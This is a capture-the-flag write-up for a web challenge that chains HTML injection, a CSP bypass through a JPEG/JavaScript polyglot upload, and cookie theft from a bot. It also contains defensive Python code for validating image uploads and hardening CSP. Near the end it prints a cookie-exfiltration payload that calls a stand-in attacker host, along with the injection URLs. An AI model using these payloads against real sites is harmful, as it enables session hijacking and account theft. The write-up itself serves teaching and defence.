
title: Kara Jutsu Access
date: Dec 25, 2022
tags: Writeup YogoshaChristmas_2022 Web


Kara Jutsu Access


Difficulty: 500 points | 31 solves

Description: Well done accessing some important information! Now I heard that some Kara members use the following website for a reason, can you retrieve Dr Amado's cookie?




🕵️ Recon

This challenge was the 4th step of the CTF. For this one, we had to find an XSS in order to steal the bot's cookie. The website was a simple web application with a profile endpoint offering an image file upload feature.

Screenshot home.png: Home page


Screenshot profile.png: Profile page


Trying to upload .svg, .html or similar files leads nowhere, as the file must be a valid PNG / JPEG. So we need to find another feature that can be used to get the XSS.

Looking around, it is possible to find a contact chat that is vulnerable to unsanitized HTML injection:

http://54.82.54.16/index.php?name=a&email=a&subject=a&message=%3Cimg%20src=x%20onerror=alert()%3E&subcom=#

Unfortunately, the website is protected by the following CSP, which only allows scripts to be loaded from the website's own origin:

<meta http-equiv="Content-Security-Policy" content=" script-src 'self'  ; object-src 'none' ; ">

Thus, to bypass this CSP, we have to find a way to upload a file that the browser will accept as JavaScript while it is hosted on the same origin.


🤡 JFIF polyglot image

To achieve the file upload explained above, two conditions must hold: the uploaded file has to pass the server's PNG / JPEG validation, and it has to be served back with a MIME type the browser does not reject for scripts.

Why do we need an acceptable MIME type? Because if we try to load a resource with <script src="XX"> and the response carries a blocked MIME type, the browser refuses to load it thanks to CORB.


What is Cross-Origin Read Blocking (CORB)?

CORB is a browser security mechanism that aims to mitigate side-channel attacks and to prevent sensitive cross-origin resources from being loaded into a website's renderer process.

To do so, it restricts the MIME types that can be loaded depending on the context. For example, for <script src="">, the response's MIME type must be one the browser accepts for scripts:

More details here: link.


Luckily for us, uploaded files are sent back to the client with the MIME type application/octet-stream, which CORB does not block for scripts. Thus, if we find a way to upload a file that is both a valid JPEG and valid JavaScript, we can bypass the CSP.

To do so, we can use this beautiful article: link. It explains how to create a JavaScript / JPEG polyglot, which is exactly what we are looking for. I won't go deep into the details of this part as @Medusa0xf did it well in his article. But you can use the following small file that I created to reproduce the exploit:

Exploit file: link.
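From the defender's side, the two weaknesses this section relies on are that the upload check only looks at the start of the file, and that the file is served as application/octet-stream under a CSP that trusts every same-origin URL. The following added example (my own code, not the challenge's) shows server-side controls that break the JPEG/JavaScript polyglot: structural validation of PNG and JPEG uploads that rejects any bytes after the image end marker (a polyglot needs room after the image data for its closing tokens), serving uploads with their real image MIME type plus X-Content-Type-Options: nosniff, and a nonce-based CSP that no longer whitelists 'self'. The sample PNG and the marker-level JPEG skeleton are constructed inline; only the standard library is used.

```python
"""Defensive upload checks for an image endpoint (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end_offset(data: bytes):
    """Walk PNG chunks verifying CRCs; return offset just past IEND, else None."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):                      # 12 = smallest chunk
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body_end = pos + 8 + length
        if body_end + 4 > len(data):
            return None
        crc = struct.unpack(">I", data[body_end:body_end + 4])[0]
        if crc != zlib.crc32(data[pos + 4:body_end]) & 0xFFFFFFFF:
            return None
        if ctype == b"IEND":
            return body_end + 4
        pos = body_end + 4
    return None


def jpeg_end_offset(data: bytes):
    """Walk JPEG marker segments; return offset just past EOI, else None."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                            # fill byte
            pos += 1
            continue
        if marker == 0xD9:                            # EOI
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # markers without length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
        if marker == 0xDA:                            # SOS: skip entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return None


def validate_upload(data: bytes):
    """Return (mime, 'ok') for a clean PNG/JPEG, or (None, reason)."""
    if data.startswith(PNG_SIG):
        mime, end = "image/png", png_end_offset(data)
    elif data.startswith(b"\xff\xd8"):
        mime, end = "image/jpeg", jpeg_end_offset(data)
    else:
        return None, "not a PNG or JPEG"
    if end is None:
        return None, "malformed %s structure" % mime
    trailing = len(data) - end
    if trailing:
        return None, "%d trailing bytes after image end marker" % trailing
    return mime, "ok"


def upload_response_headers(data: bytes):
    """Headers for serving a validated upload; raises on anything else."""
    mime, reason = validate_upload(data)
    if mime is None:
        raise ValueError(reason)
    # With nosniff the browser refuses this response for <script src>,
    # because image/* is not a JavaScript MIME type.
    return {"Content-Type": mime, "X-Content-Type-Options": "nosniff"}


def hardened_csp(nonce: str):
    """CSP that stops trusting every same-origin URL (uploads included)."""
    return "script-src 'nonce-%s'; object-src 'none'; base-uri 'none'" % nonce


def _png_chunk(ctype: bytes, payload: bytes):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png_1x1():
    """Constructed sample: a real 1x1 red RGB PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")        # filter 0 + one RGB pixel
    return (PNG_SIG + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b""))


# Constructed sample: marker-level JPEG skeleton (SOI, APP0/JFIF, SOS, a few
# entropy bytes including a stuffed FF00, EOI). Not a decodable picture.
SAMPLE_JPEG = (b"\xff\xd8"
               b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
               b"\x12\x34\xff\x00\x56"
               b"\xff\xd9")

if __name__ == "__main__":
    for name, blob in [("png", make_png_1x1()), ("jpeg", SAMPLE_JPEG),
                       ("jpeg+trailing", SAMPLE_JPEG + b"*/"), ("svg", b"<svg/>")]:
        print(name, validate_upload(blob))
```

The trailing-bytes rule is what catches the polyglot here: the marker walker happily skips a large APP0 segment whatever it contains, but the bytes the polyglot needs after the EOI marker are rejected. The stronger control in production is to re-encode every upload with an image library and store only the re-encoded output, which discards anything that is not pixel data; the headers and the nonce-based CSP then make sure that even a file that slipped through cannot be executed as a script.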


🎉 Flag

Replacing the JavaScript payload with the one below and using the uploaded file as a script source, we can exfiltrate the bot's cookie!

fetch("http://attacker.com?cookie=".concat(document.cookie))
Javascript payload


Notice the charset="ISO-8859-1" attribute, which is necessary to make the exploit work.

http://54.82.54.16/index.php?name=a&email=a&subject=a&message=<script charset="ISO-8859-1" src="<IMAGE-PATH>">&subcom=#
Link for the bot


Flag: flag=FLAG{K4ra_OnCe_Alw4y5_Kara????} 🎉